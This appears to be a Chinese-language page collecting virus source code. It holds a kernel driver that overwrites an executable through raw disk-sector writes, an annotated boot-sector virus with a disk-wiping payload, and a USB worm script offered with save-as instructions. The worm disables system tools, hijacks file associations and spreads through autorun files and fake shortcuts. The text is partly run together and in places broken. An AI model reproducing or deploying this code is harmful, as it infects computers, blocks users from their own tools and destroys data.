count=8;while(1){srb=ExAllocatePool(0,sizeof(SCSI_REQUEST_BLOCK));if(!srb)break;sense=ExAllocatePool(0,sizeof(SENSE_DATA));psense=sense;if(!sense)break;memset(srb,0,sizeof(SCSI_REQUEST_BLOCK));memset(sense,0,sizeof(SENSE_DA TA));srb->Length=sizeof(SCSI_REQUEST_BLOCK);//更多关于srb,请看《SCSI 总线和IDE接口：协议、应用和编程》和《SCSI程序员指南》srb->Function=0;srb->DataBuffer=buffer;srb->DataTransferLength=BlockCount<<9;//sector size*number of sectorsrb->QueueAction=SRB_FLAGS_DISABLE_AUTOSENSE;srb->SrbStatus=0;srb->ScsiStatus=0;srb->NextSrb=0;srb->SenseInfoBuffer=sense;srb->SenseInfoBufferLength=sizeof(SENSE_DATA);if(MajorFunction==IRP_MJ_READ)srb->SrbFlags=SRB_FLAGS_DA TA_IN;elsesrb->SrbFlags=SRB_FLAGS_DA TA_OUT;if(MajorFunction==IRP_MJ_READ)srb->SrbFlags|=SRB_FLAGS_ADAPTER_CACHE_ENABLE;srb->SrbFlags|=SRB_FLAGS_DISABLE_AUTOSENSE;srb->TimeOutValue=(srb->DataTransferLength>>10)+1;srb->QueueSortKey=DiskPos;srb->CdbLength=10;srb->Cdb[0]=2*((UCHAR)MajorFunction+ 17);srb->Cdb[1]=srb->Cdb[1] & 0x1F | 0x80;srb->Cdb[2]=(unsigned char)(DiskPos>>0x18)&0xFF; //srb->Cdb[3]=(unsigned char)(DiskPos>>0x10)&0xFF; //srb->Cdb[4]=(unsigned char)(DiskPos>>0x08)&0xFF; //srb->Cdb[5]=(UCHAR)DiskPos; //填写sector位置srb->Cdb[7]=(UCHAR)BlockCount>>0x08;srb->Cdb[8]=(UCHAR)BlockCount;//By:Eros412KeInitializeEvent(&Event, 0, 0);irp=IoAllocateIrp(dev_object->StackSize,0);mdl=IoAllocateMdl(buffer, BlockCount<<9, 0, 0, irp);irp->MdlAddress=mdl;if(!mdl){ExFreePool(srb);ExFreePool(psense);IoFreeIrp(irp);return STATUS_INSUFFICIENT_RESOURCES;}MmProbeAndLockPages(mdl,0,(MajorFunction==IRP_MJ_READ?0:1));srb->OriginalRequest=irp;irp->UserIosb=&isb;irp->UserEvent=&Event;irp->IoStatus.Status=0;irp->rmation=0;irp->Flags=IRP_SYNCHRONOUS_API|IRP_NOCACHE;irp->AssociatedIrp.SystemBuffer=0;irp->Cancel=0;irp->RequestorMode=0;irp->CancelRoutine=0;irp->Tail.Overlay.Thread=PsGetCurrentThread();isl=IoGetNextIrpStackLocation(irp);isl->DeviceObject=dev_object;isl->MajorFunction=IRP_MJ_SCSI;isl->Parameters.Scsi.Srb=srb;isl->CompletionRoutine=IrpCompletionRoutine_0;isl->Context=srb;isl->Control=SL_INVOKE_ON_CANCEL|SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ER ROR;status=MyIoCallDriver(dev_object,irp);KeWaitForSingleObject(&Event, 0, 0, 0, 0);if(srb->SenseInfoBuffer!=psense&&srb->SenseInfoBuffer)ExFreePool(srb->SenseInfoBuffer);ExFreePool(srb);ExFreePool(psense);if ( status >= 0 || !count )return status;DbgPrint("Send XXX Failed..%08x\r\n", status);KeStallExecutionProcessor(1u);--count;}return STATUS_INSUFFICIENT_RESOURCES;}PDEVICE_OBJECT GetLastDiskDeviceObject(PDRIVER_OBJECT drv_object)//这个就是DR0 {PDEVICE_OBJECT result;PDEVICE_OBJECT finddev;finddev=drv_object->DeviceObject;result=NULL;while (finddev){if (finddev->DeviceType==FILE_DEVICE_DISK)result = finddev;finddev=finddev->NextDevice;}return result;}PDEVICE_OBJECT GetAtaDr0DevObject(){UNICODE_STRING diskstr;PDRIVER_OBJECT diskdrv;PDEVICE_OBJECT dr0dev;RtlInitUnicodeString(&diskstr, L"\\Driver\\Disk");if(ObReferenceObjectByName(&diskstr,64,0,0,*IoDriverObjectType,0,0,&diskdrv)<0) return NULL;dr0dev=GetLastDiskDeviceObject(diskdrv);if(dr0dev)DbgPrint("Eros412 said : ata dr0 dev obj is : %08x...",dr0dev);ObfDereferenceObject(diskdrv);return dr0dev;}PDEVICE_OBJECT GetFileObjectDevice(PFILE_OBJECT Object){PDEVICE_OBJECT result=NULL;PVPB vpb;vpb=Object->Vpb;result=vpb->DeviceObject;if(!vpb||!result){if(!Object->DeviceObject->Vpb||!Object->DeviceObject->Vpb->DeviceObject)result=Object->DeviceObject;}return result;}PLARGE_INTEGER GetPosAndCluster()//得到第一个分区文件数据的起始位置{PVOID buffer;ULONG type,startlba;int i;PLARGE_INTEGER result;PDEVICE_OBJECT dev;PMBR_SECTOR mbrsec;PPARTITION_ENTRY partition0;PBBR_SECTOR bootsec;result=ExAllocatePool(0,sizeof(LARGE_INTEGER));dev=GetAtaDr0DevObject();if(dev){buffer=ExAllocatePool(0,512);memset(buffer,0,512);if(AtapiReadWriteDisk(dev, IRP_MJ_READ, buffer, 0, 1)>0)DbgPrint("AtapiReadWriteDisk ok");mbrsec=(PMBR_SECTOR)buffer;partition0=&mbrsec->Partition[0];startlba=partition0[0].StartLBA;type=partition0[0].PartitionType;DbgPrint("dwPartOnePos:0x%08x..1", startlba);result->QuadPart=startlba;memset(buffer,0,512);if(AtapiReadWriteDisk(dev, IRP_MJ_READ, buffer, startlba, 1)>0){bootsec=(PBBR_SECTOR)buffer;DbgPrint("gSectorsPerCluster:%d...", bootsec->SectorsPerCluster);sectorspercluster=bootsec->SectorsPerCluster;}result->QuadPart+=bootsec->ReservedSectors;DbgPrint("dwPartOnePos:%I64x..2\r\n", result->QuadPart);if(type==PARTITION_TYPE_FAT32||type==PARTITION_TYPE_FAT32_LBA) result->QuadPart+=bootsec->NumberOfFATs*bootsec->SectorsPerFAT32;DbgPrint("dwPartOnePos:%I64x..3\r\n", result->QuadPart);}elseresult->QuadPart=0;return result;}NTSTATUS OpenFile(PHANDLE FileHandle,PWCHAR filename){NTSTA TUS status;ULONG v3;int v5;UNICODE_STRING DestinationString;OBJECT_ATTRIBUTES ObjectAttributes;struct _IO_STATUS_BLOCK IoStatusBlock;RtlInitUnicodeString(&DestinationString, filename);//L"\\SystemRoot\\System32\\userinit.exe" ObjectAttributes.ObjectName = &DestinationString;ObjectAttributes.Length = 24;ObjectAttributes.RootDirectory = 0;ObjectAttributes.Attributes =OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE;// 576; ObjectAttributes.SecurityDescriptor = 0;ObjectAttributes.SecurityQualityOfService = 0;status = IoCreateFile(FileHandle, GENERIC_READ , &ObjectAttributes, &IoStatusBlock, 0, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN , 0x50u, 0, 0, 0, 0, 0);if ( status != STA TUS_SUCCESS)DbgPrint("Open File failed...%08x..", status );return status;}PLARGE_INTEGER getfilesize(PWCHAR filename){PLARGE_INTEGER filesize;HANDLE hfile;IO_STA TUS_BLOCK IoStatusBlock;filesize=ExAllocatePool(0,sizeof(LARGE_INTEGER));OpenFile(&hfile,filename);ZwQueryInformationFile(hfile, &IoStatusBlock, filesize, 24, FileStandardInformation);return filesize;}NTSTATUS InitSectors(PWCHAR filename){//得到文件在扇区的位置，存放在realdiskposPLARGE_INTEGER diskpos;NTSTATUS status,newstatus;HANDLE filehandle;PVOID testingpool;IO_STATUS_BLOCK iosb;LARGE_INTEGER ByteOffset;PFILE_OBJECT Object;PDEVICE_OBJECT dev;PIRP irp;KEVENT Event;IO_STATUS_BLOCK iosb2;PIO_STACK_LOCA TION nextio;STARTING_VCN_INPUT_BUFFER StartVcn;unsigned char abBuffer[1024];PRETRIEV AL_POINTERS_BUFFER pVcnPairs;realdiskpos.QuadPart=0;StartVcn.StartingVcn.QuadPart=0;memset(abBuffer, 0, 1024);pVcnPairs = (PRETRIEV AL_POINTERS_BUFFER)abBuffer;if(OpenFile(&filehandle,filename)!= STA TUS_SUCCESS)return 1;testingpool=ExAllocatePool(0,512);ByteOffset.QuadPart=0;if(ZwReadFile(filehandle,0,0,0,&iosb,testingpool,512,&ByteOffset,0)!=STATUS_SUCCESS){ DbgPrint("ZwReadFile error");goto end;}if(ObReferenceObjectByHandle(filehandle,0,(POBJECT_TYPE)*IoFileObjectType,0,&Object,0) <0){DbgPrint("ObReferenceObjectByHandle error");goto end;}dev=GetFileObjectDevice(Object);if(!dev){DbgPrint("Get Device Object error");goto end2;}DbgPrint("pDevObj is: %08x...",dev);irp=IoAllocateIrp( dev->StackSize, 0);if(irp==NULL)goto end2;KeInitializeEvent(&Event, SynchronizationEvent, 0);irp->AssociatedIrp.SystemBuffer=&StartVcn;irp->UserBuffer=pVcnPairs;irp->UserEvent=&Event;irp->MdlAddress=0;irp->UserIosb=&iosb2;irp->RequestorMode=KernelMode;irp->Tail.Overlay.Thread=PsGetCurrentThread();irp->Tail.Overlay.OriginalFileObject=Object;irp->Flags = 0;nextio = IoGetNextIrpStackLocation(irp);nextio->MajorFunction=IRP_MJ_FILE_SYSTEM_CONTROL;nextio->DeviceObject=dev;nextio->FileObject=Object;nextio->Parameters.FileSystemControl.InputBufferLength=sizeof(STARTING_VCN_INPUT_BUFFER);nextio->Parameters.FileSystemControl.FsControlCode=FSCTL_GET_RETRIEVAL_POINTERS; nextio->Parameters.FileSystemControl.Type3InputBuffer=&StartVcn;nextio->Parameters.FileSystemControl.OutputBufferLength=1024;nextio->CompletionRoutine=IrpCompletionRoutine;nextio->Context=0;nextio->Control=SL_INVOKE_ON_CANCEL|SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON _ERROR;MyIoCallDriver(dev,irp);KeWaitForSingleObject(&Event, 0,0,0, NULL);newstatus = iosb2.Status;if(newstatus<0){DbgPrint("MyIofCallDriver failed:%08x...",newstatus);goto end2;}DbgPrint("ExtentCount = %d",pVcnPairs->ExtentCount);DbgPrint("StartLcn = %I64x",pVcnPairs->Extents[0].Lcn.QuadPart);diskpos=GetPosAndCluster();realdiskpos.QuadPart=diskpos->QuadPart+sectorspercluster*pVcnPairs->Extents[0].Lcn.QuadPar t;if(diskpos){DbgPrint("gDiskPos is: %I64x..Cluster:%d...part offset: %08x..",realdiskpos.QuadPart,sectorspercluster,diskpos->QuadPart);}return 0;end2:if(irp!=NULL)IoFreeIrp(irp);ObDereferenceObject(Object);end:ZwClose(filehandle);if(testingpool)ExFreePool(testingpool);return 1;}VOID DriverUnload(IN PDRIVER_OBJECT DriverObject){}NTSTATUSDriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath){PLARGE_INTEGER filesize;PDEVICE_OBJECT dev;PVOID buf;ULONG psector;DriverObject->DriverUnload =DriverUnload;InitSectors(L"\\??\\c:\\telnet.exe");//找了两个大小差不多的文件，把telnet.exe的binary code 拷贝到nslookup.exe，系统重启后生效（注：当exe执行时FSD从cache里把内容拷贝过来，所以需要重启）filesize=getfilesize(L"\\??\\c:\\telnet.exe");buf=ExAllocatePool(0,filesize->LowPart);memset(buf,0x00,filesize->LowPart);dev=GetAtaDr0DevObject();psector=realdiskpos.LowPart;if(dev!=NULL&&psector!=0&&buf!=NULL){AtapiReadWriteDisk(dev,IRP_MJ_READ,buf,psector,(filesize->LowPart/512)+1);InitSectors(L"\\??\\c:\\nslookup.exe");filesize=getfilesize(L"\\??\\c:\\nslookup.exe");psector=realdiskpos.LowPart;AtapiReadWriteDisk(dev,IRP_MJ_WRITE,buf,psector,(filesize->LowPart/512)+1);}return STATUS_SUCCESS; }。

病毒源码

一个古老汇编源码的分析--主引导区病毒病毒体：JMP 01AF ;JMP到01AFDB 00 ;病毒标计DW 00F5 ;此为搬到高位址后,远程跳转指令DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AXDB 02DW 0003 ;此为软盘识别标记,硬盘为0007 （软盘时代的经典）DW EC59 ;DW F000 ;INT 13H的原入口.....XOR AX,AX ;清除AXMOV DS,AX; ;让DS=0000CLI ;清I标志积存器MOV SS,AX ;把堆栈设为0000:7C00也就是开机MOV AX,7C00 ;后载入引导分区表的地址,目前地址MOV SP,AX ;开机时为0000:7CB6STI ;设I标志积存器PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024APUSH AX ;用RETF,把程序转到引导或分区表位置MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在MOV AX,[004E] ;取INT 13H的段地址MOV [7C0C],AX ;存到010C以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13，读写以便传播发作MOV AX,[0413] ;取得内存K数,放在AXDEC AX ;DEC AX ;减2k内存MOV [0413],AX ;存回MOV CL,06 ;SHL AX,CL ;MOV ES,AX ;算出减2K后病毒本体的位址MOV [7C05],AX ;AX存入0105病毒常用手法将系统高段内存减少以便驻留 ;这样可以免于被其他程序覆盖，这样的经典设计可以用于现在很多的程序设计MOV AX,000E ;病毒拦INT 13HISR起始的偏移量MOV [004C],AX ;MOV [004E],ES ;设原为病毒的INT 13HMOV CX,01BE ;病毒长度为1BEMOV SI,7C00 ;从JMP 01AF开始XOR DI,DI ;DI=0CLD ;清方向标志REPZ;MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导CS: ;分区表能载入0000:7C00正常运作JMP FAR [7C03] ;跳到为搬过后的位址XOR AX,AX ;清AXMOV ES,AX ;ES=0000INT 13 ;复位磁盘PUSH CS ;POP DS ;让DS=CSMOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则MOV BX,7C00 ;读到0000:7C00MOV CX,[0008] ;硬盘第0道,第7扇区CMP CX,+07 ;比较是否从硬盘启动JNZ 0213 ;不是跳0213MOV DX,0080 ;第一硬盘C:第零面INT 13 ;用INT 13号中断,读JMP 023E ;跳023E比较日期,发作或正常开机MOV CX,[0008] ;软盘0道,第3扇区MOV DX,0100 ;A:的第0面INT 13 ;INT 13读盘JB 023E ;失败跳023EPUSH CSPOPES ;让ES=CSMOV AX,0201 ;MOV BX,0200 ;MOV CX,0001 ;MOV DX,0080 ;INT 13 ;读入C:的分区表到0200,以便下面比较JB 023E ;失败跳023EXOR SI,SI ;清SICLD ;清方向标志以便比较LODSW ;载入一个WORD到AXCMP AX,[BX] ;比较有无病毒存在..E9ACJNZ 0287 ;没有则跳0287传染LODSW ;载入一个WORD到AXCMP AX,[BX+02] ;再次确认..0000JNZ 0287 ;没有跳0287XOR CX,CX ;清CXMOV AH,04 ;INT 1A ;取得日期CMP DX,0306 ;是否为三月六日JZ 024B ;是跳024B传染RETF ;把程序交还给引导启动完成步骤4：病毒INT 13代码分析PUSH DS ;首先把要用到积存器PUSH AX ;入栈保存OR DL,DL ;比较是否为软盘JNZ 002F ;如不是则退出传染XOR AX,AX ;AX=0MOV DS,AX ;数据代段=0TEST BYTE PTR [043F],01 ;比较是否为A盘JNZ 002F ;不是则退出POP AX ;将以上保存积存器POP DS ;弹栈恢复PUSHF ;压栈标志积存器CS: ;以便执行原INT 13CALL FAR [000A] ;执行原INT 13PUSHF ;再次压栈CALL 0036 ;以便跳转到传染程序POPF ;跳转到执行传染RETF 0002 ;结束中断调用返回POP AX ;恢复POP DS ;堆栈CS: ;跳转到原正常INT 13JMP FAR [000A] ;地址执行此段代码中展现了病毒常用手法,利用标志积存器做跳转步骤5：传染过程分析对软盘传染过程：PUSH AX ;工PUSH BX ;作PUSH CX ;寄PUSH DX ;存PUSH DS ;器PUSH ES ;入PUSH SI ;栈PUSH DI ;保存PUSH CS ;以压/弹栈方式POP DS ;使数据段DS和PUSH CS ;附加段ES均指向POP ES ;代码段CSMOV SI,0004 ;试4次MOV AX,0201 ;设置各MOV BX,0200 ;积存器MOV CX,0001 ;为读软盘XOR DX,DX ;引导扇区做准备PUSHF ;压栈标志积存器CALL FAR [000A] ;正常的INT 13调用JNB 0063 ;成功则转判断XOR AX,AX ;不成功复位PUSHF ;磁盘继续读CALL FAR [000A] ;如果4次DEC SI ;均匀不成功JNZ 0045 ;则退出跳转JMP 00A6 ;退出传染XOR SI,SI ;SI=0以便用CLD ;LODSW读入软盘LODSW ;第1或第2字进行比较CMP AX,[BX] ;比较如果不包含病毒标志JNZ 0071 ;则跳转写传染LODSW ;如果已有标志CMP AX,[BX+02] ;则退出JZ 00A6 ;传染子程序MOV AX,0301 ;为写盘准备MOV DH,01 ;如果是360KMOV CL,03 ;则写到1面0道3扇区CMP BYTE PTR [BX+15],FD ;比较软盘JZ 0080 ;如果大于360KMOV CL,0E ;写到1面0道14扇区MOV [0008],CX ;写病毒标志到软盘PUSHF ;调用原INT 13CALL FAR [000A] ;进行传染JB 00A6MOV SI,03BE ;以下是将正常MOV DI,01BE ;引导扇区从MOV CX,0021 ;1BE起的21字节内容CLD ;搬移到病毒程序尾部REPZ ;开始复制MOVSWMOV AX,0301 ;写盘功能调用,写一个扇区XOR BX,BX ;将病毒程序MOV CX,0001 ;写入软盘引导扇区内XOR DX,DX ;设置为软盘PUSHFCALL FAR [000A] ;执行正常INT 13调用写盘POP DI ;将POP SI ;工POP ES ;作POP DS ;寄POP DX ;存POP CX ;器POP BX ;退POP AX ;栈RET ;返回调用处对硬盘传染过程：MOV CX,0007 ;第7扇区MOV [0008],CX ;此处为硬盘引导标记MOV AX,301 ;写功能调用MOV DX,0080 ;设置为硬盘INT 13 ;将正常引导扇区写到0面0道7扇区内JB 13E ;失败则转MOV SI,03BE ;原分区表地址MOV DI,01BE ;目标地址MOV CX,0021 ;整个分区表REPNZMOVSW ;开始复制此段代码是将硬盘分区信息,搬移到病毒程序尾部，这样在分析着查看硬盘分区信息时仍能看到该部分内容,以次来麻痹分析者MOV AX,0301 ;准备写病毒提进硬盘XOR BX,BX ;病毒体位置INC CL ;第一扇区INT 13 ;开始写盘传染JMP 013E ;转到13E处判断是否为3月6日，是则发作步骤6：破坏过程分析主要分析对硬盘数据破坏：.....MOV DL,80MOV BYTE PTR[0007],04准备写硬盘MOV AL,11 ;写17个扇区MOV BX,5000MOV ES,BX ;从内存ES:5000中处开始写INT 13 ;残不人睹JNB 0179 ;成功转179继续写XOR AH,AHINT 13 ;不成功复位磁盘继续INC DH ;使写操作磁头加1继续?CMP DH,[0007] ;比较是否小于0007单元值JB 0150 ;是则返回开始处继续写XOR DH,DH ;DH=0INC CH ;再加扇区JMP 0150 ;反回继续写以上操作实际上是对硬盘执行4次写操作，每次17个扇区共68个扇区，这样就完全破坏了盘中的引导扇区，根目录和文件分配表。

U盘病毒--vbs快捷方式病毒源代码【分析↓】

U盘病毒--vbs快捷⽅式病毒源代码【分析↓】注意：把以下的复制到“记事本”后，在“另存为”操作时，名称为worm.vbs，“保存类型”为“所有⽂件”，“编码”为“ANSI”。

不然会提⽰错误信息，型如⾏：1字符：1错误：⽆效字符代码：800A0408源： microsoft vbscript 编译器错误'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''主函数⾄此结束''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''Sub MonitorSystem()'结束taskmgr.exe、regedit.exe、msconfig.exe、cmd.exeOn Error Resume NextDim ProcessNames, ExeFullNamesProcessNames=Array("cmd.exe","","regedit.exe","regedit.scr","regedit.pif","","msconfig.exe")'ProcessNames相当于数组⾸地址VBSFullNames=Array(GetMainVirus(1))DoCall KillProcess(ProcessNames)Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))'1:smss.exe:72161642.vbsCall KeepProcess(VBSFullNames) '0:explorer.exe:72161642.vbs'上⾯这句⽤来保持进程活跃WScript.Sleep 3000LoopEnd SubSub InvadeSystem(VirusLoadPath,VirusAssPath)On Error Resume NextDim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, VersionLoad_Value=""""&VirusLoadPath&""""'smss.exe的病毒流File_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" %1 %* "IE_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OIE "MyCpt_Value1="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OMC "MyCpt_Value2="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" EMC "HCULoad="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"HCUVer="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"HCUDate="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"VirusCode=GetCode(WScript.ScriptFullName)Version=1HostSourcePath=Fso.GetSpecialFolder(1)&"\Wscript.exe"HostFilePath=Fso.GetSpecialFolder(0)&"\system\svchost.exe"For Each Drive In Fso.Drives'分别建⽴各个⽬录的病毒名字If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) ThenDiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs"Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)Call InfectRoot(Drive.DriveLetter,DiskVirusName)End IfNextIf FSO.FileExists(VirusAssPath)=False Or FSO.FileExists(VirusLoadPath)=False Or FSO.FileExists(HostFilePath)=False Or GetVersion()< Version Then If GetFileSystemType(GetSystemDrive())="NTFS" Then'NTFS格式Call CreateFile(VirusCode,VirusAssPath)Call CreateFile(VirusCode,VirusLoadPath)'这⼀步创建了流⽂件Call CopyFile(HostSourcePath,HostFilePath)'这⼀步将wscript.exe从system32复制到system⽬录并改名svchost.exeCall SetHiddenAttr(HostFilePath)Else'FAT32格式Call CreateFile(VirusCode, VirusAssPath)Call SetHiddenAttr(VirusAssPath)Call CreateFile(VirusCode,VirusLoadPath)Call SetHiddenAttr(VirusLoadPath)Call CopyFile(HostSourcePath, HostFilePath)Call SetHiddenAttr(HostFilePath)End IfEnd IfIf ReadReg(HCULoad)<>Load_Value Then'改写注册表启动项，smss.exe的流Call WriteReg (HCULoad, Load_Value, "")End IfIf GetVersion() < Version Then'改写版本信息为1Call WriteReg (HCUVer, Version, "")End IfIf GetInfectedDate() = "" ThenCall WriteReg (HCUDate, Date, "")'记录感染时间End If'以下更改许多⽂件关联,病毒的通⽤感染⽅式If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>File_Value ThenCall SetTxtFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\")<>File_Value ThenCall SetIniFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\")<>File_Value ThenCall SetInfFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\")<>File_Value ThenCall SetBatFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\")<>File_Value ThenCall SetCmdFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>File_Value ThenCall SetRegFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>File_Value ThenCall SetchmFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>File_Value ThenCall SethlpFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\")<>IE_Value ThenCall SetIEAss(VirusAssPath)End IfIf ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\")<>IE_Value ThenCall SetIEAss(VirusAssPath)End IfIf ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\")<>MyCpt_Value1 ThenCall SetMyComputerAss(VirusAssPath)End IfIf ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\")<>MyCpt_Value2 ThenCall SetMyComputerAss(VirusAssPath)End IfCall RegSet()End SubSub CopyFile(source, pathf)On Error Resume NextIf FSO.FileExists(pathf) ThenFSO.DeleteFile pathf , TrueEnd IfFSO.CopyFile source, pathfEnd SubSub CreateFile(code, pathf)On Error Resume NextDim FileTextIf FSO.FileExists(pathf) ThenSet FileText=FSO.OpenTextFile(pathf, 2, False)FileText.Write codeFileText.CloseElseSet FileText=FSO.OpenTextFile(pathf, 2, True)FileText.Write codeFileText.CloseEnd IfEnd SubSub RegSet()'⽂件夹选项的注册表设置On Error Resume NextDim RegPath1 , RegPath2, RegPath3, RegPath4RegPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"'隐藏选项失效RegPath2="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"'隐藏选项失效RegPath3="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"RegPath4="HKEY_CLASSES_ROOT\lnkfile\IsShortcut"Call WriteReg (RegPath1, 3, "REG_DWORD")Call WriteReg (RegPath2, 2, "REG_DWORD")Call WriteReg (RegPath3, 0, "REG_DWORD")'开启所有⾃动播放Call DeleteReg (RegPath4)'隐藏快捷⽅式⼩箭头End SubSub KillProcess(ProcessNames)'杀掉进程On Error Resume NextSet WMIService=GetObject("winmgmts:\\.\root\cimv2")For Each ProcessName in ProcessNamesSet ProcessList=WMIService.execquery(" Select * From win32_process where name ='"&ProcessName&"' ") For Each Process in ProcessListIntReturn=1'Process.terminateIf intReturn<>0 ThenWshShell.Run "CMD /c ntsd -c q -p "&Process.Handle, vbHide, FalseEnd IfNextNextEnd SubSub KillImmunity(D)'删掉autorun.inf免疫⽬录On Error Resume NextImmunityFolder=D&":\Autorun.inf"If Fso.FolderExists(ImmunityFolder) ThenWshSHell.Run ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True'提权WshSHell.Run ("CMD /C RD /S /Q "& ImmunityFolder), vbHide, True'rd命令删除，配合 /s /q 选项，很轻松End IfEnd SubSub KeepProcess(VBSFullNames)'保持脚本进程持续运⾏，少于2个创建新进程On Error Resume NextFor Each VBSFullName in VBSFullNamesIf VBSProcessCount(VBSFullName) < 2 thenRun("%SystemRoot%\system\svchost.exe "&VBSFullName)End IfNextEnd SubFunction GetSystemDrive()'获取系统盘的盘符，⽐如c:GetSystemDrive=Left(Fso.GetSpecialFolder(0),2)End FunctionFunction GetFileSystemType(Drive)'获取对应驱动器的⽂件系统格式Set d=FSO.GetDrive(Drive)GetFileSystemType=d.FileSystemEnd FunctionFunction ReadReg(strkey)'读取注册表，搜索strkey，返回所在路径Dim tmpsSet tmps=CreateObject("WScript.Shell")ReadReg=tmps.RegRead(strkey)Set tmps=NothingEnd FunctionSub WriteReg(strkey, Value, vtype)'写注册表Dim tmpsSet tmps=CreateObject("WScript.Shell")If vtype="" Thentmps.RegWrite strkey, ValueElsetmps.RegWrite strkey, Value, vtypeEnd IfSet tmps=NothingEnd SubSub DeleteReg(strkey)'删除注册表Dim tmpsSet tmps=CreateObject("WScript.Shell")tmps.RegDelete strkeySet tmps=NothingEnd SubSub SetHiddenAttr(path)'6=2+4,分别是隐藏、系统属性On Error Resume NextDim vfSet vf=FSO.GetFile(path)Set vf=FSO.GetFolder(path)vf.Attributes=6End SubSub Run(ExeFullName)'执⾏ExeFullName指定的⽂件On Error Resume NextDim WshShellSet WshShell=WScript.CreateObject("WScript.Shell")WshShell.Run ExeFullNameSet WshShell=NothingEnd SubSub InfectRoot(D,VirusName)'感染根⽬录On Error Resume NextDim VBSCodeVBSCode=GetCode(WScript.ScriptFullName)VBSPath=D&":\"&VirusNameIf FSO.FileExists(VBSPath)=False ThenCall CreateFile(VBSCode, VBSPath)Call SetHiddenAttr(VBSPath)End IfSet Folder=Fso.GetFolder(D&":\")'隐藏根⽬录下的所有⼦⽬录Set SubFolders=Folder.SubfoldersFor Each SubFolder In SubFoldersSetHiddenAttr(SubFolder.Path)LnkPath=D&":\"&&".lnk"'创建对应的快捷⽅式TargetPath=D&":\"&VirusNameArgs=""""&D&":\"&& "\Dir"""If Fso.FileExists(LnkPath)=False Or GetTargetPath(LnkPath) <> TargetPath ThenIf Fso.FileExists(LnkPath)=True ThenFSO.DeleteFile LnkPath, TrueEnd IfCall CreateShortcut(LnkPath,TargetPath,Args)End IfNextEnd SubSub CreateShortcut(LnkPath,TargetPath,Args)'上⼀步失败了调⽤这个函数创建快捷⽅式Set Shortcut=WshShell.CreateShortcut(LnkPath)with Shortcut.TargetPath=TargetPath.Arguments=Args.WindowStyle=4.IconLocation="%SystemRoot%\System32\Shell32.dll, 3".Saveend withEnd SubSub CreateAutoRun(D,VirusName)'创建autorun.inf⽂件On Error Resume NextDim InfPath, VBSPath, VBSCodeInfPath=D&":\AutoRun.inf"VBSPath=D&":\"&VirusNameVBSCode=GetCode(WScript.ScriptFullName)If FSO.FileExists(InfPath)=False Or FSO.FileExists(VBSPath)=False ThenCall CreateFile(VBSCode, VBSPath)Call SetHiddenAttr(VBSPath)StrInf="[AutoRun]"&VBCRLF&"Shellexecute=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open=打开(&O)"&VBCRLF&"shell\open\command=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open\Default=1"& 